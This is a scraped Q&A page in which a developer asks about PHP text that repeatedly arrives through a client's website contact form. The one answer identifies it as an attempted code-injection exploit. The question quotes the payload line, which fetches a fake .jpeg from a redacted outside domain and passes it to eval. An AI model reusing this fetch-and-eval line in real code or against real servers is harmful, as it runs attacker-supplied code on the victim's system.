stackoom
  简体   繁体   中英

I don't understand some php code that is inserted in an e-mail we receive

 原文  2021-06-02 09:32:47       php/ email

Question

My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:

-----Message d'origine----- De: Envoyé: Aucune Objet:

$a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg'); eval('?>'.$a);

I replaced the domain name in the url by **** for confidentiality reasons. The domain name in the url of the get_contents function is unknown to us.

Do you have any idea what it could be? Spam? Bad configuration? Thanks in advance for your advice !

1 answers

solution1
 3 ACCPTED  

It's an attempt to exploit (an apparently non-existent) code injection vulnerability . The use of eval is a dead giveaway.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Some CSS of my PHP HTML e-mail form don't get into the mail form Why do I need an e-mail accaunt to send mails on ruby and don't need such on php? I wrote some jquery, html and php code for e-mail form contact but something is wrong PHPMailer don't send e-mail PHP code not sending e-mail Send an E-mail from a php code Add a part of my form to the e-mail i receive using PHP PHP E-Mail Client - Overcoming slow send/receive Contact form only sends when I don't input an e-mail PHP mail function doesn't complete sending of e-mail
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM